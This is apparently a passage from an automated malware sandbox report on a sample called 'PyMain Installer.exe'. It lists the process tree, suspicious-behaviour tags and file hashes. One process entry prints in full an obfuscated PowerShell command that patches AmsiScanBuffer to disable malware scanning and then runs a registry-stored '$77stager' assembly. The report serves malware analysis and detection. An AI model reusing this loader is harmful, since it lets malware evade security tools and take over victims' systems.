dllhost.exe 70 PID 2736 wrote to memory of 1508 2736 dllhost.exe 71 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2626a063-1136-4832-99e2-ed69d0226c2d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1184
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lvqCzTjVGmdx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OOWCpsCUZmwRPX,[Parameter(Position=1)][Type]$gtJHfyTfVA)$wvbGvrFnAOK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+'M'+'o'+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+'le'+'g'+'at'+'e'+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+'t'+''+'o'+'C'+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wvbGvrFnAOK.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+'ci'+[Char](97)+'lN'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+'deB'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OOWCpsCUZmwRPX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');$wvbGvrFnAOK.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'ir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$gtJHfyTfVA,$OOWCpsCUZmwRPX).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $wvbGvrFnAOK.CreateType();}$JKORgPWACXhhT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+'t'+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+'f'+'t'+[Char](46)+'W'+[Char](105)+''+'n'+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+'s'+'afe'+[Char](78)+''+[Char](97)+''+'t'+'i'+[Char](118)+''+'e'+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$DjtZqvouReEyLD=$JKORgPWACXhhT.GetMethod(''+'G'+''+'e'+'tP'+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UorKpMHKUdLiBzxasrZ=lvqCzTjVGmdx @([String])([IntPtr]);$vozCZieDITrhYqRrhYHaSA=lvqCzTjVGmdx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kBLoOWAkuko=$JKORgPWACXhhT.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$FBugFsxhUYvcbW=$DjtZqvouReEyLD.Invoke($Null,@([Object]$kBLoOWAkuko,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+'A')));$gcoMVtyqoEuCYxqcX=$DjtZqvouReEyLD.Invoke($Null,@([Object]$kBLoOWAkuko,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+'ual'+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$HoeySLm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FBugFsxhUYvcbW,$UorKpMHKUdLiBzxasrZ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$JngjJmygNruGRzczv=$DjtZqvouReEyLD.Invoke($Null,@([Object]$HoeySLm,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+'u'+'ff'+[Char](101)+''+'r'+'')));$owUOuFrYIE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gcoMVtyqoEuCYxqcX,$vozCZieDITrhYqRrhYHaSA).Invoke($JngjJmygNruGRzczv,[uint32]8,4,[ref]$owUOuFrYIE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JngjJmygNruGRzczv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gcoMVtyqoEuCYxqcX,$vozCZieDITrhYqRrhYHaSA).Invoke($JngjJmygNruGRzczv,[uint32]8,0x20,[ref]$owUOuFrYIE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1500
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2684
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4524
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1880
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2052
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4744
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3368
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:5088
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1804
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3068
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3424
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe"C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe"2⤵PID:3260
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3632
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3824
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3980
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1288
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3412
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4260
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:220
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1468
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1544
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2996
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82